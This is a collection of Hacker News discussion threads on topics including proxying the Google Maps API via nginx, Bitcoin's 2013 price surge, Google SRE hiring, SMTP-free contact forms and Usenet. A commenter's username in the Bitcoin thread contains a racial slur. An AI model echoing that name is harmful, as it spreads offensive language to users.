Hello, I have an issue with my site in that I need to be able to maintain anonymity for users. I also use 3rd party APIs such as the Google Maps API - this means that a user's browser directly communicates with Google for map queries.<p>Simply put, is there a way I can use nginx (or Flask/WSGI) to "proxy" the request, so that the script points to my server, then my server gets the 3rd party script, then passes the results back to the client (thus removing the direct interaction with Google's servers)?<p>Thanks
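One common approach for the nginx route is a reverse-proxy location block. The sketch below is illustrative only: the `/maps-proxy/` path, upstream host, and stripped headers are assumptions, not a tested configuration:

```nginx
# Sketch only: point client-side code at /maps-proxy/... so the browser
# only ever talks to your own server; nginx fetches from the third party.
location /maps-proxy/ {
    proxy_pass https://maps.googleapis.com/;
    proxy_set_header Host maps.googleapis.com;
    proxy_ssl_server_name on;

    # Avoid forwarding anything identifying about the end user upstream.
    proxy_set_header X-Forwarded-For "";
    proxy_set_header Referer "";
    proxy_set_header Cookie "";
}
```

One caveat: a script-level JS API like Google Maps typically makes its own follow-up requests (tiles, fonts, geocoding) directly to Google's domains from the browser, so proxying only the script URL won't anonymize those; you would need to proxy or rewrite every endpoint the script touches.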
======
hoodoof
You might consider stackoverflow.com or superuser.com for technically oriented
Q&A like this.
| {
"pile_set_name": "HackerNews"
} |
BTC $141 USD - niggler
https://mtgox.com/#
======
AndrewDucker
How are people still actually using it to _buy_ things?
My problem with this rate of change is that it makes it harder to use it as a
means of buying things.
If I see an item for sale for 2.5BTC then it can take me an hour to translate
my GBP into BTC. Then I carry out the exchange, and then they have to transfer
it back to their currency (if they want to spend it on most things).
If the value has gone up 15% in that time then what price should they be
charging me?
Should a shopfront be updating its prices on an hourly basis?
I'm all for BTC being valuable, but it needs to have _some_ stability to be
used as a method of value exchange.
~~~
swinglock
I bought a domain at Namecheap. That sent me over to BitPay which I gave the
current USD price in BitCoins and an hour later Namecheap had accepted the
payment.
~~~
Devilboy
And two days later you regretted not hoarding the bitcoin instead.
~~~
swinglock
I don't, the price was good and the amount was tiny. Sure it would have been
better today but I needed it yesterday.
That wasn't the point though, the point is yes, you can buy stuff and it's
simple. Apart from the hour it takes to confirm the transaction (this is done
by the BitCoin network, nothing any user or particular party needs to do) it
was much less of a hassle than paying with a credit card... at least if you
already have the BitCoins.
------
russellallen
A currency which changes in value by around 40% in a 24 hour period is
completely useless for the transactions I mostly deal with. We worry about a
few percent change over weeks and insist on hedges.
Imagine saying to someone - I'll put 1000 BTC into your venture when you reach
the next milestone in two months. What's that going to be? USD 100,000? USD
50,000? USD 1.50?
~~~
niggler
"A currency which changes in value by around 40% in a 24 hour period is
completely useless for the transactions I mostly deal with"
1\. IIRC Silk road uses some average price rather than the spot price
2\. Does anyone provide BTC hedging? Seems like a pretty useful and profitable
service.
~~~
ragmondo
To enable hedging, someone would have to take a forward position in USD/BTC ..
and at the moment, the market is in contango ( see
<http://en.wikipedia.org/wiki/Contango> ) which means that the sentiment is
that the price will continue to increase for the near term ... ie you'd have
to be very brave indeed in order to put a limit on the expected BTC price.
~~~
niggler
"you'd have to be very brave indeed in order to put a limit on the expected
BTC price."
Or quote a fairly aggressive price (so that the hedger pays a significant
premium for the service)
Also, how are you getting futures/forward prices on USDBTC?
------
bryanlarsen
Standard bubble advice applies here.
1) the market can stay irrational longer than you can stay solvent. (Keynes)
2) a bird in the hand is worth two in the bush. Bank your profits. It turns
exponential gains into linear gains, throwing away a huge amount of potential
profits. But a small amount of real profit is worth more than a huge amount of
potential profit.
~~~
codesuela
Just sold my BTC for about 75% profit within a few weeks, still probably gonna
bite myself in the ass if Bitcoin ever hits 1000 USD
~~~
jaimebuelta
75% profit within few weeks seems EXTREMELY good to me. I can't really see the
problem (yes, I know for a emotional point of view. Just think about 75% in a
few weeks)
------
Nursie
But it's still not a bubble, no sir, the bitcoin economy has just really
kicked in to the tune of 40% growth in the last 24 hours...
------
pazimzadeh
The latest price is always here:
<http://bitcoinity.org/markets>.
I'm not sure that a new submission is required every day.
~~~
rplnt
I'm sure they are not required and they are annoying even. Especially when the
submission adds absolutely nothing. And as a bonus links to a page that is not
valid few minutes after posting.
------
daveungerer
I'm surprised that someone hasn't started another Bitcoin yet. Is it harder
than just changing some initial seed? Because the artificial scarcity of
digital currency is what's allowing for these high prices.
Then all you need is intermediary parties that will exchange your V2 Bitcoins
for V1 Bitcoins (which will currently have the highest acceptance for buying
things). Over time, V2, V3 etc. may even become accepted directly by
merchants, if they become big enough.
UPDATE: Thanks for the info on additional ones. This is getting really
interesting. So my initial scarcity hypothesis was wrong, which means it's
just pure herd mentality. Hopefully over time the availability of multiple
currencies will lead to some sort of equilibrium though.
~~~
rheide
Litecoin. Namecoin. Ixcoin. Ppcoin. Terracoin. Devcoin.
------
mkr-hn
That's a lot of tulips.
------
bluedevil2k
_cough_ sell now _cough_
~~~
rheide
Yet people aren't. Apparently there's still enough belief to warrant this kind
of growth.
(..getting ready to eat my own words, real soon..)
------
freakyterrorist
Surely this madness has to end soon?
Also seriously regretting not buying it when it was "expensive" at <$5 :(
~~~
nkozyra
Some of us bought ours around $.85 and sold when there was _no way_ it could
go any higher around $30.
~~~
niggler
"Some of us bought ours around $.85 and sold when there was no way it could go
any higher around $30."
Picking tops and bottoms is a fool's game.
------
crazytony
Not being fluent in the ins and outs of bitcoin: what is driving this? Is it
pure speculation? Are more people trying to get in on the BTC wagon (riding
the Cyprus wave)?
~~~
Nursie
Speculation.
There doesn't seem to be any evidence that (in the world of BTC) the Cyprus
situation has triggered anything other than rampant speculation by non-cypriot
libertarians who already distrust central banks and now have a boogeyman to
point at.
------
meerita
It makes it impossible for a developer to charge BTC for any service. Tell me
how you do it without being overpriced the next day.
~~~
EarthLaunch
Calculate the exchange rate automatically? This is not 1900.
~~~
meerita
Really? That wasn't my point. I was talking about making use of the bitcoin
value as a statement. Of course I can charge in yen and convert it on the fly
to dollars or pounds, but that wasn't the point.
It's really hard to make BTC popular on a website when every refresh can bring
you a new value. It's horrible for business. BTC right now is more useful for
trading than for other low-end business operations like paying one month of
hosting or buying a toy.
------
polshaw
I cannot ----ing believe it. I thought there would be a bump when it hit $100,
but not this much. It's just insane, I was calling it a bubble since $30, and
it's doubled again and again..
I wonder how low the crash will go? I'm guessing it won't be below $30.
~~~
Nursie
Depends how many people get badly burned by this I would have thought. It
could pretty easily drop to almost nothing if confidence is completely bust,
as the 'fundamentals' supporting the price of BTC are far from obvious.
------
Matsta
My 2¢ is that it's gonna crash like it did a couple years back. Then would be
the best time to buy, since it will probably do this crazy business once
again.
~~~
paulhodge
Of course, it's not going to crash very far if enough people are thinking
this.
------
kmfrk
I guess the y-axis should be logarithmic at this point.
------
Yuioup
I still don't understand how a nonexistent coin could be worth anything. No
really. How does solving an algorithm translate into value?
~~~
niggler
Value, be it in gold or silver or USD or EUR or bitcoin or cars or art, is a
perceived phenomenon. Something has value because others are willing to trade
it for goods and services (or for other forms of value). Gold and silver are
trusted stores of value because they have been used in that capacity for
centuries (and for a very long time, USD were silver certificates so there was
real metal backing the paper)
The underlying value of BTC, IMO, is the anonymity feature (the ability to
conduct commerce without a clear centralized record identifying you by name).
Once that is compromised, it's not clear what value BTC will have.
~~~
ragmondo
Anonymity is not really the selling feature of bitcoin - in fact it really
only offers pseudo-anonymity.
The fact that no-one else can just "print" bitcoins, and that you can transfer
funds at internet speed to anybody else anywhere in the world and that (after
a short time), the transaction cannot be reversed are the main utilities.
~~~
jaimebuelta
Yes, I think it is possible, in the long run, to figure out who's behind a
wallet, assuming that the Bitcoin use is frequent and convenient (meaning no-
super-high-inconvenient-counter-measures are used, but a regular use of
currency)
In that case, my concern is that I think it will be possible to determine ALL
the transactions of that wallet. Making it even less anonymous than regular
currencies.
I could be missing something, but if confirmed, that could be a problem for
using Bitcoin as a regular currency
~~~
Nursie
There are various laundering schemes, and there's nothing stopping you using
new wallets constantly.
But yes, in effect, every transaction is traceable and public, AFAICT.
~~~
jaimebuelta
Yes, I understand that there are things that you can do. But, as those are in
the way of convenience, we can assume that not everyone will take the extra
effort to create constantly new wallets, etc.
So, in case someone can trace you to a wallet, that someone can know all your
transactions (of course, only the transactions for that wallet), which is a
huge potential privacy risk.
------
nsns
It's like in Germany in the 30's.
~~~
glennos
I was thinking that as well, but it's actually the opposite. Germany
experienced hyperinflation, where the value of the Mark decreased rapidly.
This is the currency increasing in value, so "hyperdeflation" I guess.
| {
"pile_set_name": "HackerNews"
} |
Lessons from a Google App Engine SRE on how to serve over 100B requests per day - rey12rey
https://cloudplatform.googleblog.com/2016/04/lessons-from-a-Google-App-Engine-SRE-on-how-to-serve-over-100-billion-requests-per-day.html
======
dekhn
I used to be a scientist and I went to work at Google to apply their
technology to science problems. My first team was SRE- and I have to say,
Google's SRE approach to computing completely changed how I thought about
things, and more importantly, how I programmed systems that went to
production. I've read the SRE book and can highly recommend learning from the
principles it lays out.
~~~
kiloreux
Can you please give a reference to that book?
~~~
dekhn
It's the one mentioned in the interview, [http://www.amazon.com/Site-
Reliability-Engineering-Productio...](http://www.amazon.com/Site-Reliability-
Engineering-Production-Systems-ebook/dp/B01DCPXKZ6)
------
mikecb
The book they mention[1] is very good so far.
[1][https://play.google.com/store/books/details/Betsy_Beyer_Site...](https://play.google.com/store/books/details/Betsy_Beyer_Site_Reliability_Engineering?id=tYrPCwAAQBAJ)
~~~
thedevil
Upvoting because this link is cheaper than the Amazon link.
~~~
pkaye
If you are willing to wait, many times of the year O'Reilly will have their
ebooks on sale for 50%-60% off. The best time is black friday.
------
i336_
> Advance preparation, combined with extensive testing and contingency plans,
> meant that we were ready when things went [slightly wrong] and were able to
> minimize the impact on customers.
Following that link provided some interesting reading (for a mundane error
report, at least): [https://groups.google.com/forum/#!msg/google-appengine-
downt...](https://groups.google.com/forum/#!msg/google-appengine-downtime-
notify/T_e7lVg7QNY/lifcqZBcracJ)
TIL that even Google have datacenter fluctuations they can't figure out. It's
nice that they quietly make this info publicly available, and also nice that
I've now discovered where to find it :)
~~~
desarun
I love their solution.
They turned it off, then on again
------
bobp127001
I've been seeing a lot of references to SRE recently. Is Google trying to
market this position and acquire more engineers?
The SRE book, and Google in general, have mentioned that SREs are notoriously
hard to hire, and I'm wondering if they are doing a marketing push.
~~~
thrownaway2424
SREs are very hard to hire, speaking from experience. At Google SRE directors
and VPs will often cherry-pick promising candidates from the mainline SWE
hiring pipeline and give them a "hero call" to convert them to SREs. SREs at
Google are also paid more, controlling for level and performance, as a way to
hire and retain.
~~~
Reedx
Interesting. Can you expand on "hero call"? What does that entail?
~~~
agentultra
Donning a cape and meeting destiny.
In all seriousness they make it out to be more than it is. From my experience
going through their hiring pipeline there seem to be two tracks in SRE;
software and sysadmin. If you score higher in algorithms and data-structures,
presumably, you'll end up working more on tools and libraries whereas in the
other you'll work more on infrastructure and automation. Either way both
tracks work together on the same team towards the same goals.
If you want in be prepared to solve simple-to-tough algorithms problems and be
quizzed on TCP re-transmission, Linux system calls, and memory pressure. It's
a bit challenging because you not only have to know Big-O well enough to
estimate the asymptotic complexity of an arbitrary algorithm but you might
also be asked what a sequence of TCP packets would look like if you sent some
data and pulled the plug or what the parameters are to a given system call on
Linux. You quite literally have to know everything from how virtual memory
works, how to implement a fast k-means, how the network stack works from top
to bottom, etc, etc.
If you've done any work in cloud development and supporting moderately large
one it's that but bigger. Make one a hero, it does not.
------
nunez
I'm actually really really glad that Google released this book because I think
they are one of the few companies that is actually doing this SRE thing right.
I think the hardest bit about the SRE paradigm (like DevOps) is having
companies wholly adopt it, and I think that this book being out will help
change that.
------
tdmule
This got me wondering what the AWS services' workload per day was. The best
numbers I could find were from this 2013 article about serving ≈95 billion
requests per day for just S3. The size and scope of cloud providers is truly
cool and fascinating engineering.
[https://aws.amazon.com/blogs/aws/amazon-s3-two-trillion-
obje...](https://aws.amazon.com/blogs/aws/amazon-s3-two-trillion-
objects-11-million-requests-second/)
------
mtgx
I don't know why this isn't on HN, but this is another interesting post from
the Google Cloud Platform blog from today:
[https://cloudplatform.googleblog.com/2016/04/Google-and-
Rack...](https://cloudplatform.googleblog.com/2016/04/Google-and-Rackspace-co-
develop-open-server-architecture-based-on-new-IBM-POWER9-hardware.html)
~~~
rey12rey
It is ->
[https://news.ycombinator.com/item?id=11440179](https://news.ycombinator.com/item?id=11440179)
------
ec109685
s/lessons/lesson/
"If you put a human on a process that’s boring and repetitive, you’ll notice
errors creeping up. Computers’ response times to failures are also much faster
than ours. In the time it takes us to notice the error the computer has
already moved the traffic to another data center, keeping the service up and
running. It’s better to have people do things people are good at and computers
do things computers are good at."
------
yelnatz
1,157,407 requests per second.
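The arithmetic behind that figure, assuming the 100 billion requests are spread evenly across a day:

```python
# 100 billion requests per day, averaged over the 86,400 seconds in a day.
requests_per_day = 100_000_000_000
seconds_per_day = 24 * 60 * 60  # 86,400

avg_rps = requests_per_day // seconds_per_day
print(avg_rps)  # 1157407
```

Real traffic isn't uniform, of course, so peak capacity would need to be provisioned well above this average.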
~~~
iLoch
One Node.js server can do 10x that! /s
------
thirdreplicator
Only 100 bytes? That's easy... Sheesh.
| {
"pile_set_name": "HackerNews"
} |
Send email without any SMTP - NicolasRz_
Hello all.<p>A few weeks ago, I was building two showcase sites.<p>The first with Wordpress and the second without (just html/css/js on Netlify).<p>And like every time, my customers wanted a contact form.<p>For the website on Netlify, I was like, damn, I need to get a server and configure an SMTP server only to send email to my customer from his website...<p>For the Wordpress website, I used ContactForm7 and EasySmtp to achieve this.
But I needed the Gmail email/password from my customer ... and to explain why I needed this information...
Every time it's complicated and/or boring.<p>And I thought, really? Is there nothing easier than all of that?<p>No.<p>So I decided to build NoSmtp.
A Wordpress plugin that sends email without any configuration.
Of course, I need at least my client's email, to send email to him, and the website address.
Ok, it's now built and working in production.<p>Ok, I solved the Wordpress problem.<p>Next.<p>My NoSmtp can work with a simple ajax call. But I wanted something else, something that needs no code, that anyone could use.
So I built a Chrome extension, where you can click on your form inputs (email/subject/body, something like that).
The next step is just to include a simple js link in your html head. And it's working.<p>The Chrome extension and the javascript code are not ready to be in prod, but almost!<p>That's all.<p>My NoSmtp sends through Mailjet, with a paid plan of course, so emails reach their destination!<p>I came here to get your feedback: what do you think about it? Is it useless, not interesting? Or something that could help some people?<p>I made a demo for the Wordpress plugin, which you can see here: https://www.youtube.com/watch?v=w-ZyaIiuEg8&feature=youtu.be
Another video will come for the Chrome extension ^^<p>Thanks in advance :)<p>Link to the website: https://bit.ly/39r0Hvr
seanwilson
Try [https://formspree.io/](https://formspree.io/) (I've used this for around
5 years with zero issues, and it's super easy to set up) or
[https://www.typeform.com/](https://www.typeform.com/).
Google for something like "email contact form for static site" to find others.
I'm surprised there isn't a standard free one by now. There's a ton of others,
usually with a small free tier and then a modest paid tier price. The free
ones usually don't last long until they shut down.
Can you set Netlify to email forms without using Zapier? I can't get my head
around why Netlify don't make emailing a contact form a core feature - it's
essential to almost every business site.
~~~
NicolasRz_
Hey, I didn't know Formspree, thanks!
Yes, I can plug NoSmtp into any Netlify site.
~~~
seanwilson
> Yes I can plug no smtp to any netlify
Hmm, had a quick look at no smtp and it looks like a similar same thing as
Formspree. Formspree has been around for a while now though and has a bigger
free tier so I'd side with that. Works on any website too, just paste the HTML
snippet in.
Like I mentioned, I've seen a ton of services like this come and go each time
I research this. I'm guessing they shut down when they don't make enough money
or get hit with spam/abuse, so I'd be cautious about using one that's not been
around for a while.
------
harshad_bn
Hello there,
My first question: once the other methods, i.e. CF7 and EasySmtp, are set up,
there's no problem as such, so why is there such a need? I am not convinced
that there's any need for NoSmtp to that large an extent. Let me know if I am
missing something here.
Next, sending email via an extension is not a viable option. Adding a button
which pops up an email interface would be better.
To make your extension and NoSmtp more valuable, you could add options to
send bulk email via the extension for free up to 10,000 emails, which is the
limit of Mailjet if I am not wrong.
Thanks
~~~
NicolasRz_
Hello, thanks for the reply!
Indeed CF7 and EasySmtp are great plugins. But I wanted something easier.
For example, like I said for EasySmtp, I always have to ask my customer for
Gmail credentials to set it up. And sometimes it's complicated.
And sorry for the explanation about the chrome extension. It's not clear, I
see.
It's not an extension to send email ^^.
Imagine you have a static website online with only html/css/js and you don't
want to have a backend or you don't know how to code (to make an ajax call).
I propose including a simple js file (one of mine), and with the chrome
extension you can click on your form inputs to set it up. And that's all.
It's a no-code way to have a working contact form without coding and without
a server or SMTP ^^
Maybe with a video it will be clearer.
I'll keep your idea about the extension in mind :D
But like you said, maybe there's no need. I had this need but maybe I was the
only one haha.
------
auganov
Well, for customers I'd say that's a worse solution as they will now depend on
a potentially less-reliable 3rd party for something so simple. But who knows,
maybe for the sheer ease of installation some people will prefer that.
Wouldn't be surprised. You could probably add some more features on top of
this to make for a stronger value proposition.
As for the Chrome Extension I don't get what it's supposed to do.
------
sethammons
Disclaimer, I work with Twilio SendGrid.
SendGrid has a Wordpress plugin too, fwiw.
| {
"pile_set_name": "HackerNews"
} |
Bison 3.3 Released - edelsohn
https://lwn.net/Articles/777594/
======
azhenley
Discussion from yesterday:
[https://news.ycombinator.com/item?id=19007302](https://news.ycombinator.com/item?id=19007302)
| {
"pile_set_name": "HackerNews"
} |
Man coughed up an intact blood clot shaped like a lung passage - greenyoda
https://www.theatlantic.com/health/archive/2018/12/bronchial-blood-clot/577480/
======
masonic
A _36-year-old_ with end-stage heart failure?
| {
"pile_set_name": "HackerNews"
} |
Feds investigate why a Tesla crashed into a truck Friday, killing driver - ilamont
https://arstechnica.com/cars/2019/03/feds-investigating-deadly-friday-tesla-crash-in-florida/
======
elisharobinson
I can forgive the reporter for making a clickbait title, but at least give
the news some time to rest and get all the facts. From the brief info
provided in the article, the only thing clear is that the driver was in the
car when the accident occurred and that some agency is investigating the
"accident" and not the manufacturing units of the company, two very different
things. As a minor aside, it would behoove media organizations to disclose
the short or long positions they have on any company they are reporting on.
| {
"pile_set_name": "HackerNews"
} |
Facebook Offers work like a charm. Here is proof! - acoyfellow
http://i.imgur.com/lvCSf.png
======
Casseres
It's just a poorly written ad. The add is for the realty company, but they put
the info of just one of their houses in the title to show what you can get.
| {
"pile_set_name": "HackerNews"
} |
The Target Isn’t Hollywood, MPAA, RIAA, Or MAFIAA: It’s The Policymakers - llambda
http://torrentfreak.com/the-target-isnt-hollywood-mpaa-riaa-or-mafiaa-its-the-policymakers-120205/?utm_source=dlvr.it&utm_medium=twitter
======
tzs
Flagged for idiotic use of the term MAFIAA. Normally it is just childish, like
M$ or crApple, but by using it along with MPAA and RIAA it also becomes
redundant.
~~~
Falkvinge
It was intended as "whatever you call them" rhetoric.
| {
"pile_set_name": "HackerNews"
} |
Sales-Driven Side Projects - lloydarmbrust
http://seeinginteractive.com/newspaper-support-group/sales-driven-side-projects/
======
necolas
By the article's own logic, the examples of Twitter and Gmail probably
wouldn't have come into being if they were sales-driven side projects.
I don't think Vinicius' article was making a general statement about side
projects being bad. His experience was that they can be dangerous distractions
while you are still in the "startup transition cycle".
~~~
jeremymims
\- Vinicius's article was great advice, so please don't consider this a knock
on it.
\- I wasn't really trying to outline sales-driven side projects in that part
of the article, merely successful ones.
\- For truly mature companies (ones who are out of the startup phase), side
projects are a healthy thing to encourage because they can afford to take
risks with their time and money. We were looking for a standard by which a
startup like ours could tackle a side project. This is the standard we hit on
that seems to be working for us. Of course there are others. And in different
kinds of companies with different kinds of cultures, we'd expect variation.
~~~
necolas
"We were looking for a standard by which a startup like ours could tackle a
side project." \- Thanks for the clarification.
------
gfodor
This is a good article, but it goes a bit too far. The concept of a sales
driven side project is a good one, but it's an _attribute_ of a side project,
not a _requirement_.
The value of this post is that it should bring into focus the two types of
side projects: those that are sales driven, and those that are not. Both have
their place when growing a company!
------
noworatzky
Can you tell us about what you are working on?
~~~
jeremymims
We're not really in the habit of announcing products before we've launched
them (although we've already pre-sold this product to several customers). If
you work with a newspaper we're not already working with, give us a call at
(888) 850-2497. We'll schedule a demo for you after we've launched our initial
customers.
------
trotsky
I think the developer version of this phrase is "getting the customer to pay
for R&D" or, more simply, consulting* .
It sounds like you're suggesting doing fixed price software development
bids... In my experience that's not a great way to avoid painful outcomes.
*with an ownership clause.
~~~
jeremymims
It might seem like it, but it's not. We won't build one-off projects and
nothing we do is a one-time fee. Almost everything we do (except for setup
fees and training fees) is recurring revenue. These projects have to be
generally applicable to our market and it must be sold to at least one of our
existing customers beforehand with others who have expressed interest.
If we were doing fixed price development bids, I would agree that we'd be
facing some serious pain down the road.
------
nobody_nowhere
Sales-driven everything.
~~~
yters
Son, sorry, you aren't bringing in the bucks in pre-school. You have a week to
increase sales or you're out on the street.
~~~
nobody_nowhere
Applejuice is for closers.
------
jay_kyburz
Can somebody confirm, then let the author know, that disqus comments make the
article unreadable on iPad because the text is covered by a big white square.
When it loads you can't see the text of the main body. I've seen it on
several blogs now.
~~~
jeremymims
Thanks for letting us know. We'll take a look.
~~~
jay_kyburz
It's the disqus element up the top alongside the headline.
| {
"pile_set_name": "HackerNews"
} |
Bulk data collection vital to prevent terrorism in UK, report finds - jsingleton
https://www.theguardian.com/world/2016/aug/19/bulk-data-collection-vital-to-prevent-terrorism-in-uk-report-finds
======
jsingleton
The actual report (Report of the Bulk Powers Review) 192 pages [PDF]:
[https://www.gov.uk/government/uploads/system/uploads/attachm...](https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/546925/56730_Cm9326_WEB.PDF)
One from last year (A question of trust: report of the investigatory powers
review) 379 pages [PDF]:
[https://www.gov.uk/government/uploads/system/uploads/attachm...](https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/434399/IPR-
Report-Web-Accessible1.pdf)
Key points:
[https://www.theguardian.com/world/2015/nov/04/investigatory-...](https://www.theguardian.com/world/2015/nov/04/investigatory-
powers-bill-the-key-points)
BBC's take on it: [http://www.bbc.co.uk/news/uk-
politics-37130455](http://www.bbc.co.uk/news/uk-politics-37130455)
| {
"pile_set_name": "HackerNews"
} |
Dark Mode–Overhyped or Necessity? - tomayac
https://web.dev/prefers-color-scheme/
======
downrightmike
Necessity without a doubt. Without it, my eyes burn and I start to get a
headache.
| {
"pile_set_name": "HackerNews"
} |
Angular-httpshooter - punkhaa
https://www.npmjs.com/package/angular-httpshooter
======
punkhaa
I developed this factory and it gives me a lot of control over the loaders
and UI changes. Does anyone else think it is useful?
| {
"pile_set_name": "HackerNews"
} |
The economics of awful blockbuster movies - hermanywong
http://qz.com/102902/the-economics-of-awful-blockbuster-movies/
======
elmuchoprez
This article seems to imply that there used to be some sort of highly
intellectual, dialogue driven summer blockbuster that we're moving away from
as a direct result of them not translating well to non-English speaking
audiences. Off the top of my head, I can't think of a single "intellectual"
summer blockbuster even years and years ago (maybe Forrest Gump?).
| {
"pile_set_name": "HackerNews"
} |
Thoughts on Convertible Notes - diego
http://k9ventures.com/blog/2011/03/22/thoughts-on-convertible-notes
======
grellas
A few thoughts:
1\. As a general rule, founders like notes and investors do not. The reason
notes are more often used today than before is one of power and control.
Founders today have more bargaining power and can insist on going with notes.
Investors may not like this but, if they like a company and want to invest,
that is their option. This reflects a longer-term trend by which quality
startups have become easier to launch with comparatively smaller capital
needs, and this has enabled founders to keep more control through the early
stages of a company's growth. I believe this trend is becoming permanent,
which is one of the reasons for pg's observations about the predominance of
notes in today's climate.
2\. Building a startup is a teaming effort and the ideal cases consist of
founders and investors who work together to build a great company while
keeping their interests aligned. But this point only goes so far. Just ask any
desperate founder who is under a cash crunch how much investors are prepared
to give their cash on founder-friendly terms in the name of "alignment of
interests." At a basic level, the issue with funding centers about power and
control. Founders use notes because they can, and investors allow it because
they have no choice if they want to invest.
3\. The main advantage with notes is that they come with few strings. Once you
set up preferred stock, investors become a dominant (even if not controlling)
force within the company. Many things that you once had freedom to do you are
no longer free to do without investor consent, and that includes choices about
future funding. In addition, with notes, you don't have to reprice your stock
price or fool with such things as 409A valuations too early in the company's
history. With equity, you inject added costs and complications, and many
founders want to avoid that in the very early stages. Such things tend to be
distracting and tend to put more emphasis on fund raising as a process than
would otherwise be the case. Again, just ask the YC companies who are getting
the $150K notes with almost no strings attached. The main benefit: it lets
them concentrate up front more on building their products than if they had to
hustle up survival money right up front.
Bottom line: most founders will go with notes when they can because of power
and control and intangible factors such as alignment of interests with
investors, the educational value of learning to manage a board, etc. will not
normally sway them in the other direction.
All that said, this is a splendid dissection of some of the key factors
affecting the use of convertible notes in early-stage funding. A very nice
piece.
~~~
daniel_levine
An ordered reply. I personally do not care note versus not, but am friendly
with many angels who do and think they have great points.
1\. Notes are worse for founders in most cases. Manu outlines why quite well.
Misalignment, downside protection only for investors w/ a cap, liquidation
preference, callable debt that can kill companies.
2\. Many of the best seed investors do not do notes anymore, so they're not
really allowing it. Founders appear to be using notes because of the opinions
of a few people, mostly investors themselves. The same bias should apply
there.
3\. I agree here, but then someone should come up with standard docs with no
strings (kinda like YC's Series AA docs). It will be a bit pricier but not
much. See Fred Wilson's post today.
Most founders go with notes because someone they trust has told them to not
because they have thought it out. And that's fine, but especially lately I
continue to hear more stories where founders have gotten screwed by notes.
In particular I recently heard about an Angel calling in their debt and
killing a Series A. That doesn't seem like what's best for the founders.
| {
"pile_set_name": "HackerNews"
} |
Jonathan Haidt on the moral mind - unignorant
http://www.ted.com/talks/jonathan_haidt_on_the_moral_mind.html
======
fnid
At 6:30, he mentions there are only small groups in nature, but neglects ants,
bees, and others in the insect world.
| {
"pile_set_name": "HackerNews"
} |
Generating and Populating Caves in a Roguelike Game - jsnell
http://www.gridsagegames.com/blog/2016/03/generating-populating-caves/
======
Shoop
Brogue, another roguelike, has impressive level generation as well. Here's a
great interview with the developer about how it all works.
[https://www.rockpapershotgun.com/2015/07/28/how-do-
roguelike...](https://www.rockpapershotgun.com/2015/07/28/how-do-roguelikes-
generate-levels/)
~~~
yoklov
Wow, I've actually read through Brogue's level generation code, and this is an
excellent writeup. Makes many aspects of it much clearer!
| {
"pile_set_name": "HackerNews"
} |
Amygdala MKI is a robot in the form of a human-like limb - bryanrasmussen
http://marcodonnarumma.com/works/amygdala/
======
RodgerTheGreat
Seems rather heavy on thesis and light on execution. The footage in the video
doesn't do much to demonstrate that the robot learns or adapts; it mostly
appears to writhe around and recoil when it encounters resistance. Futher
iteration on the concept might prove interesting.
| {
"pile_set_name": "HackerNews"
} |
Does anyone still use Usenet? - gen3
I recently bought some bandwidth hoping to look around, but I am having a hard time finding any community with content. Did I just arrive to the party late? (Newsgroups that you used to follow would also be appreciated.)
======
simonblack
Yep.
This is my newsgroup list: Some of these groups have posts practically every
day, some have posts that are few and far between.
1 aus.computers.linux
2 comp.os.coherent
3 comp.os.cpm
4 comp.sys.northstar
5 comp.os.linux.misc
6 alt.os.linux.mint
7 alt.autos.mercedes
8 alt.os.linux.debian
My NNTP server is eternal-september, my articles-downloading software is
_slrnpull_.
My local handling of articles is a partial installation of _cnews_ , my news-
reader software is a slightly modified version of _tass_ , both of which were
originally components of my Coherent software installation.
------
pasttense01
The major use of Usenet currently is for file-sharing of copyrighted media.
It's safer than torrents if you only want to download--since for torrents you
are also uploading.
------
pwg
Yes. The following groups have some activity in them:
comp.lang.tcl, comp.misc, alt.os.linux.slackware, sci.crypt,
comp.os.linux.misc.
Many of the comp.lang.* groups have activity.
~~~
leed25d
talk.bizarre?
------
Simulacra
I tried accessing newsgroups for the first time in 20 years but was unable to
find a way in without paying. Is there a free way into Usenet?
~~~
pwg
Yes, if you want the textual discussions groups, then at least:
Eternal September ([https://www.eternal-september.org/](https://www.eternal-
september.org/))
or
AIOE: ([https://www.aioe.org/](https://www.aioe.org/))
are free possibilities.
| {
"pile_set_name": "HackerNews"
} |
Algorithms Notes for Professionals book - mithunmanohar1
http://goalkicker.com/AlgorithmsBook/
======
ocdtrekkie
These are actually pretty neat guides, I've found one of them pretty handy
before. Though I would like to see this site in particular add notes on when
they update these. They are "books", but they're updated like websites, with
no indication of whether they have been updated. So... if I have a local copy,
I have no way to know if it's out of date.
| {
"pile_set_name": "HackerNews"
} |
Browser DOM Api in JavaDoc style - snambi
http://krook.org/jsdom/
======
kodablah
You also have the (probably outdated) actual w3c javadoc [1] and GWT docs that
closely emulate the DOM [2]. I believe yours is a tad bit more complete (and
not all Java-related), but less documented.
1 - <http://www.w3.org/2003/01/dom2-javadoc/index.html> 2 - [http://google-
web-toolkit.googlecode.com/svn/javadoc/latest/...](http://google-web-
toolkit.googlecode.com/svn/javadoc/latest/com/google/gwt/dom/client/package-
summary.html)
~~~
snambi
The link is _not_ a Java API. It is the JavaScript DOM API available in the
browser, but documented in javadoc style. Of course, w3c has more detailed
documentation, but it is hard to refer to quickly. A javadoc-style API is very
easy to navigate and refer to.
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Anybody who wants to start a project in the crypto space? - campingalert
Hey!<p>I do have a lot of time in the next two weeks and want to build something in the cryptospace. I am open for everything: Niche site, affiliate site, SaaS, app,...<p>Only condition: It should be profitable from the first week.<p>Ping me at [email protected] if you are interested :)<p>Regards,
Jakob
======
grizzles
profitable in the first week? I almost lol'ed until I saw "in the
cryptospace". You'll probably make 8+figs
~~~
campingalert
Are you interested in starting something together?
| {
"pile_set_name": "HackerNews"
} |
Researchers dismantle Mark Zuckerberg’s “meaningful interactions” argument - theBashShell
https://www.fastcompany.com/90300343/stanford-researchers-dismantle-mark-zuckerbergs-meaningful-interactions-argument
======
dontreact
I deactivated my Facebook as an experiment in response to this study. I was
already a very low volume user (uninstalled the app and almost never posted).
The effect size mentioned in the publication on subjective wellbeing was quite
small (.1 standard deviation approximately). So far the fear that I’m missing
something important, or that I will lose touch with someone I care about is
out weighing the benefits. However, I am seeing myself forge new connections
as well as strengthen some old ones. I think that if I can stay strong and
keep down this path I may start to see a net benefit.
~~~
flashgordon
So I have gotten over the FOMO by simply allowing FB to send me notification
emails to see if I have been tagged and so far nothing (been about a month).
If I am tagged then my filter is to only use the web version if I was tagged
by someone I cared about!
| {
"pile_set_name": "HackerNews"
} |
